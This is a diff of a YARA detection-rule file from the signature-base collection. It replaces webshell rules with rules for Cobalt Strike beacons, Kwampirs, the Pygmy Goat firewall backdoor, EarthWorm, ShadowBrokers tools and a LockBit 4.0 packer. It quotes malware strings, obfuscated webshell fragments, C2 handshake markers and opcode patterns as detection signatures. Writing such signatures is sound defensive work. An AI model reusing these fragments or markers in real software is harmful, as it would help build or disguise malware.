+		$s240 = { F0 F1 F0 F1 F0 F2 ?? ?? F0 F2 F0 F1 F0 F2 ?? ?? F0 F3 F0 F2 F0 F4 ?? ?? ?? ?? F0 F4 F0 F2 F0 F4 ?? ?? ?? ?? F0 F5 F0 F1 F0 F2 ?? ?? }
+		$s241 = { F1 F0 F1 F0 F1 F3 ?? ?? F1 F3 F1 F0 F1 F3 ?? ?? F1 F2 F1 F3 F1 F5 ?? ?? ?? ?? F1 F5 F1 F3 F1 F5 ?? ?? ?? ?? F1 F4 F1 F0 F1 F3 ?? ?? }
+		$s242 = { F2 F3 F2 F3 F2 F0 ?? ?? F2 F0 F2 F3 F2 F0 ?? ?? F2 F1 F2 F0 F2 F6 ?? ?? ?? ?? F2 F6 F2 F0 F2 F6 ?? ?? ?? ?? F2 F7 F2 F3 F2 F0 ?? ?? }
+		$s243 = { F3 F2 F3 F2 F3 F1 ?? ?? F3 F1 F3 F2 F3 F1 ?? ?? F3 F0 F3 F1 F3 F7 ?? ?? ?? ?? F3 F7 F3 F1 F3 F7 ?? ?? ?? ?? F3 F6 F3 F2 F3 F1 ?? ?? }
+		$s244 = { F4 F5 F4 F5 F4 F6 ?? ?? F4 F6 F4 F5 F4 F6 ?? ?? F4 F7 F4 F6 F4 F0 ?? ?? ?? ?? F4 F0 F4 F6 F4 F0 ?? ?? ?? ?? F4 F1 F4 F5 F4 F6 ?? ?? }
+		$s245 = { F5 F4 F5 F4 F5 F7 ?? ?? F5 F7 F5 F4 F5 F7 ?? ?? F5 F6 F5 F7 F5 F1 ?? ?? ?? ?? F5 F1 F5 F7 F5 F1 ?? ?? ?? ?? F5 F0 F5 F4 F5 F7 ?? ?? }
+		$s246 = { F6 F7 F6 F7 F6 F4 ?? ?? F6 F4 F6 F7 F6 F4 ?? ?? F6 F5 F6 F4 F6 F2 ?? ?? ?? ?? F6 F2 F6 F4 F6 F2 ?? ?? ?? ?? F6 F3 F6 F7 F6 F4 ?? ?? }
+		$s247 = { F7 F6 F7 F6 F7 F5 ?? ?? F7 F5 F7 F6 F7 F5 ?? ?? F7 F4 F7 F5 F7 F3 ?? ?? ?? ?? F7 F3 F7 F5 F7 F3 ?? ?? ?? ?? F7 F2 F7 F6 F7 F5 ?? ?? }
+		$s248 = { F8 F9 F8 F9 F8 FA ?? ?? F8 FA F8 F9 F8 FA ?? ?? F8 FB F8 FA F8 FC ?? ?? ?? ?? F8 FC F8 FA F8 FC ?? ?? ?? ?? F8 FD F8 F9 F8 FA ?? ?? }
+		$s249 = { F9 F8 F9 F8 F9 FB ?? ?? F9 FB F9 F8 F9 FB ?? ?? F9 FA F9 FB F9 FD ?? ?? ?? ?? F9 FD F9 FB F9 FD ?? ?? ?? ?? F9 FC F9 F8 F9 FB ?? ?? }
+		$s250 = { FA FB FA FB FA F8 ?? ?? FA F8 FA FB FA F8 ?? ?? FA F9 FA F8 FA FE ?? ?? ?? ?? FA FE FA F8 FA FE ?? ?? ?? ?? FA FF FA FB FA F8 ?? ?? }
+		$s251 = { FB FA FB FA FB F9 ?? ?? FB F9 FB FA FB F9 ?? ?? FB F8 FB F9 FB FF ?? ?? ?? ?? FB FF FB F9 FB FF ?? ?? ?? ?? FB FE FB FA FB F9 ?? ?? }
+		$s252 = { FC FD FC FD FC FE ?? ?? FC FE FC FD FC FE ?? ?? FC FF FC FE FC F8 ?? ?? ?? ?? FC F8 FC FE FC F8 ?? ?? ?? ?? FC F9 FC FD FC FE ?? ?? }
+		$s253 = { FD FC FD FC FD FF ?? ?? FD FF FD FC FD FF ?? ?? FD FE FD FF FD F9 ?? ?? ?? ?? FD F9 FD FF FD F9 ?? ?? ?? ?? FD F8 FD FC FD FF ?? ?? }
+		$s254 = { FE FF FE FF FE FC ?? ?? FE FC FE FF FE FC ?? ?? FE FD FE FC FE FA ?? ?? ?? ?? FE FA FE FC FE FA ?? ?? ?? ?? FE FB FE FF FE FC ?? ?? }
+		$s255 = { FF FE FF FE FF FD ?? ?? FF FD FF FE FF FD ?? ?? FF FC FF FD FF FB ?? ?? ?? ?? FF FB FF FD FF FB ?? ?? ?? ?? FF FA FF FE FF FD ?? ?? }
+		$fp1 = "ICSharpCode.Decompiler" wide
 
 	condition:
-		all of them
+		any of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Hkdoordll
+rule SIGNATURE_BASE_Cobaltstrike_MZ_Launcher
 {
 	meta:
-		description = "Webshells Auto-generated - file hkdoordll.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c4cfb575-89c3-5a72-8bf5-234d4284fe9d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Detects CobaltStrike MZ header ReflectiveLoader launcher"
+		author = "yara@s3c.za.net"
+		id = "461a4741-11c5-53d9-b8e1-52d64cfe755b"
+		date = "2021-07-08"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8280-L8291"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L297-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b715c009d47686c0e62d0981efce2552"
-		logic_hash = "a3c4d262b59cdf82390c0457810505e9e7a18c9b26ba4524bc368fd2141ec306"
+		logic_hash = "aa188546db138dffdcdbf6538367b5d5bc37638a2784b24b7fcd913c15e56072"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
+		$mz_launcher = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D }
 
 	condition:
-		all of them
+		$mz_launcher
 }
-rule SIGNATURE_BASE_R57Shell_2
+rule SIGNATURE_BASE_Cobaltstrike_Unmodifed_Beacon
 {
 	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d3a3fe11-c9e1-523b-88a3-ddc0c1085d04"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Detects unmodified CobaltStrike beacon DLL"
+		author = "yara@s3c.za.net"
+		id = "8eeb03f9-9698-5a46-b45b-224d5c3f3df7"
+		date = "2019-08-16"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8292-L8303"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L309-L320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8023394542cddf8aee5dec6072ed02b5"
-		logic_hash = "5319426928d33b62527efb561c2b7a226a5a473735f501b267e6b3b174972085"
+		logic_hash = "10114a431fb70be8e18e67b22aa76bf2c0536f07d373f717c1dc51755e0847c9"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_Mithril_V1_45_Dlltest
-{
-	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2aea84b6-1b51-58cd-b52b-c31b1f75d295"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8304-L8317"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b9e518aaa62b15079ff6edb412b21e9"
-		logic_hash = "cf1e2ca39ae6b726792bbbaf0f1dd90788a4bb9ba5e3d50c22d75f2b3d4e9e7d"
-		score = 50
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "syspath"
-		$s4 = "\\Mithril"
-		$s5 = "--list the services in the computer"
+		$loader_export = "ReflectiveLoader"
+		$exportname = "beacon.dll"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Dbgiis6Cli
+rule SIGNATURE_BASE_MAL_Kwampirs_Apr18 : KWAMPIRS
 {
 	meta:
-		description = "Webshells Auto-generated - file dbgiis6cli.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2bc59a6b-f45c-5e68-a346-ac56e8f2757b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8318-L8330"
+		description = "Kwampirs dropper and main payload components"
+		author = "Symantec"
+		id = "298e2868-e90e-55b4-9115-9f0b43521266"
+		date = "2018-04-23"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kwampirs.yar#L1-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3044dceb632b636563f66fee3aaaf8f3"
-		logic_hash = "f6de3c9b8fbcca230540d1b41659ab02c9548df69f53fa9d5730ac7bb7dfe88a"
+		logic_hash = "e9387c46b9e3fff90415c46af270d143bdeb6292f2521d889b8d6ae726a4cf3b"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "KWAMPIRS"
+		family = "Kwampirs"
 
 	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
-		$s5 = "###command:(NO more than 100 bytes!)"
+		$pubkey = {
+            06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
+            01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5
+            97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9
+            E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31
+            48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A
+            CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11
+            56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33
+            02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2
+            9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28
+            4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B
+            4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71
+            6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9
+            59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36
+            EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
+            C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6
+            FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D
+            90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF
+            F7 E4 0C B3
+        }
+		$network_xor_key = {
+            B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38
+            C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0
+            91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58
+            C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68
+            CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B
+            8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02
+            D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9
+            62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B
+            10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E
+            BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83
+            3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B
+            A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91
+            75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C
+            A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7
+            45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F
+            DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33
+        }
+		$decrypt_string = {
+            85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74
+            4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9
+            40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51
+            E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB
+            74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38
+            40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3
+            32 C0 C3
+        }
+		$init_strings = {
+            55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00
+            00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8
+            B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02
+            10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02
+            10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00
+            00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06
+        }
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Remview_2003_04_22
+rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_AES_Key : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file remview_2003_04_22.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3088ee27-42a3-5140-98de-ab6f87c7748b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8331-L8342"
+		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the Pygmy Goat AES key built on the stack or in data"
+		author = "NCSC"
+		id = "62be3f4f-b435-54b2-b596-4ad01606edb8"
+		date = "2024-10-22"
+		modified = "2024-12-12"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_sophos_pygmy_nov24.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17d3e4e39fbca857344a7650f7ea55e3"
-		logic_hash = "2957f6ec7a022ac04759724276f6928625708346903597b0765b5e81207fc6b9"
+		logic_hash = "da6c5d7a03eab01ddbb460cbdd16622839b3a52cfa4e91f169d3d477c60cfed4"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FSO_S_Test
-{
-	meta:
-		description = "Webshells Auto-generated - file test.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b0cc5a2a-c741-50dd-854f-5a43769e8f47"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8343-L8355"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "82cf7b48da8286e644f575b039a99c26"
-		logic_hash = "62613bead716717f116290b1c9eca9aa63eadd280050811e30a54e5d186af2fc"
-		score = 50
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 69
+		tags = "FILE"
+		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
 
 	strings:
-		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
-		$s2 = "fwrite ($fp, \"$yazi\");"
+		$dword_1 = { 59 4b 6e 77 }
+		$dword_2 = { 51 6a 6d 41 }
+		$dword_3 = { 54 62 41 6e }
+		$dword_4 = { 52 6f 5a 6d }
+		$dword_5 = { 30 66 47 37 }
+		$dword_6 = { 55 5a 57 62 }
+		$dword_7 = { 32 59 55 78 }
+		$dword_8 = { 55 51 50 77 }
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and all of them and filesize < 4MB
 }
-rule SIGNATURE_BASE_Debug_Cress
+rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_Magic_Strings : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file cress.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6cf3e43c-bec1-5688-b1d7-8ac48d59153a"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8356-L8368"
+		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the magic byte sequences used in C2 communications."
+		author = "NCSC"
+		id = "7df6c228-d569-5f1c-8bbb-4194347f99d1"
+		date = "2024-10-22"
+		modified = "2024-12-12"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_sophos_pygmy_nov24.yar#L26-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "36a416186fe010574c9be68002a7286a"
-		logic_hash = "670e236e72d3cb52ea5dba865749baee58a70f8d100db1dd8eddfe3183339181"
+		logic_hash = "df40e818002a72ee649dd2bb79cb59938dc108690cce03c99a72fc036406c4b2"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
 
 	strings:
-		$s0 = "\\Mithril "
-		$s4 = "Mithril.exe"
+		$c2_magic_handshake = ",bEB3?=o"
+		$fake_ssh_banner = "SSH-2.0-D8pjE"
+		$fake_ed25519_key = { 29 cc f0 cc 16 c5 46 6e 52 19 82 8e 86
+      65 42 8c 1f 1a d4 c3 a5 b1 cb fc c0 26 6c 31 3c 5c 90 3a 24 7d e4 d3 57
+      6d da 8e cb f4 66 d1 cb 81 4f 63 fd 4a fa 06 e4 7e 4c a0 95 91 bd cb 97
+      a4 b3 0f }
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and any of them
 }
-rule SIGNATURE_BASE_Webshell
+rule SIGNATURE_BASE_MAL_Earthworm_Socks_Proxy_ID_Generation : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file webshell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8369-L8384"
+		description = "Detects EarthWorm - a reverse socks proxy used by the threat group that deployed Pygmy Goat malware on Sophos XG firewall devices. The detection is based on the pool num generation x86 assembly."
+		author = "NCSC"
+		id = "242777e4-3abb-50d8-8c45-746cc4a8b1f8"
+		date = "2024-10-22"
+		modified = "2024-12-12"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_sophos_pygmy_nov24.yar#L46-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f2f8c02921f29368234bfb4d4622ad19"
-		logic_hash = "e3fdce426d2f6e88d8e9412a3026ea05d027af934763eafe0188602458c2289d"
+		logic_hash = "6837cba2637ed02d1d620c037b200d528c09a39498c1e320873a3a244e67932c"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
 
 	strings:
-		$s0 = "RhViRYOzz"
-		$s1 = "d\\O!jWW"
-		$s2 = "bc!jWW"
-		$s3 = "0W[&{l"
-		$s4 = "[INhQ@\\"
+		$chartoi = {
+         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
+         c1 e0 07 // SHL EAX,0x7
+         89 c1 // MOV ECX,EAX
+         8b 55 ?? // MOV EDX,dword ptr [EBP + ??]
+         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
+         01 d0 // ADD EAX,EDX
+         0f b6 00 // MOVZX EAX,byte ptr [EAX]
+         0f be c0 // MOVSX EAX,AL
+         01 c8 // ADD EAX,ECX
+         89 45 ?? // MOV dword ptr [EBP + ??],EAX
+         83 6d ?? 01 // SUB dword ptr [EBP + ??],0x1
+      }
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_FSO_S_EFSO_2
+rule SIGNATURE_BASE_FVEY_Shadowbrokers_Jan17_Screen_Strings : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file EFSO_2.asp"
+		description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e88d324c-1dee-5b07-b528-cf760e3ee7a6"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8385-L8397"
+		id = "59832d0a-0cb2-5eb9-a4e2-36aaa09a3998"
+		date = "2017-01-08"
+		modified = "2023-12-05"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_jan17.yar#L10-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-		logic_hash = "462c713e5d4fb6d0db91b14bfacdca73f780559ba2dad80988c356ee1a3d369d"
+		logic_hash = "8015b227c5df68fffadb86b72843b2b831d5603978ada3f50cc535a870aa94eb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
-		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+		$x1 = "Danderspritz" ascii wide fullword
+		$x2 = "DanderSpritz" ascii wide fullword
+		$x3 = "PeddleCheap" ascii wide fullword
+		$x4 = "ChimneyPool Addres" ascii wide fullword
+		$a1 = "Getting remote time" fullword ascii
+		$a2 = "RETRIEVED" fullword ascii
+		$b1 = "Added Ops library to Python search path" fullword ascii
+		$b2 = "target: z0.0.0.1" fullword ascii
+		$c1 = "Psp_Avoidance" fullword ascii
+		$c2 = "PasswordDump" fullword ascii
+		$c4 = "EventLogEdit" fullword ascii
+		$d1 = "Mcl_NtElevation" fullword ascii wide
+		$d2 = "Mcl_NtNativeApi" fullword ascii wide
+		$d3 = "Mcl_ThreatInject" fullword ascii wide
+		$d4 = "Mcl_NtMemory" fullword ascii wide
 
 	condition:
-		all of them
+		filesize < 2000KB and ( 1 of ( $x* ) or all of ( $a* ) or 1 of ( $b* ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $c* ) ) or 3 of ( $c* ) or ( uint16( 0 ) == 0x5a4d and 3 of ( $d* ) ) )
 }
-rule SIGNATURE_BASE_Thelast_Index3
+rule SIGNATURE_BASE_Mal_Lockbit4_Packed_Feb24 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file index3.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41310217-b9a7-5360-80c4-7d0a3969f848"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8398-L8409"
+		description = "Detect the packer used by Lockbit4.0"
+		author = "0x0d4y"
+		id = "3c2b2806-9dce-4dce-a7ca-89ebc9005695"
+		date = "2024-02-16"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit4_packed_win_feb24.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cceff6dc247aaa25512bad22120a14b4"
-		logic_hash = "3700141ca2cf53f49618e2d4cab8866efccdce843921f1733b3d6260b8feea68"
-		score = 75
+		hash = "15796971d60f9d71ad162060f0f76a02"
+		logic_hash = "07281fd86efbb7167ba1cc0c6f6897418751df1a3697869e51f806c26641e365"
+		score = 100
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.lockbit"
 
 	strings:
-		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
+		$unpacking_loop_64b = { 8b 1e 48 83 ee fc 11 db 8a 16 72 e5 8d 41 01 41 ff d3 11 c0 01 db 75 0a }
+		$jump_to_unpacked_code_64b = { 48 8b 2d 16 0f ?? ?? 48 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 49 89 e1 41 b8 04 ?? ?? ?? 53 5a 90 57 59 90 48 83 ec ?? ff d5 48 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 4c 8d 4c 24 ?? 4d 8b 01 53 90 5a 90 57 59 ff d5 48 83 c4 ?? 5d 5f 5e 5b 48 8d 44 24 ?? 6a ?? 48 39 c4 75 f9 48 83 ec ?? e9 }
+		$unpacking_loop_32b = { 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 9C 29 C0 40 9D 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 73 }
+		$jump_to_unpacked_code_32b = { 8b ae ?? ?? ?? ?? 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 54 6a 04 53 57 ff d5 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 ff d5 58 8d 9e 00 f0 ?? ?? 8d bb ?? ?? ?? ?? 57 31 c0 aa 59 49 50 6a 01 53 ff d1 61 8d 44 24 ?? 6a ?? 39 c4 75 fa 83 ec ?? e9 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $jump_to_unpacked_code_* ) and 1 of ( $unpacking_loop_* )
 }
-rule SIGNATURE_BASE_Adjustcr
+rule SIGNATURE_BASE_SUSP_RDP_File_Indicators_Oct24_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file adjustcr.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4b3d9409-60e8-502a-b37b-1e06d57c9b0b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
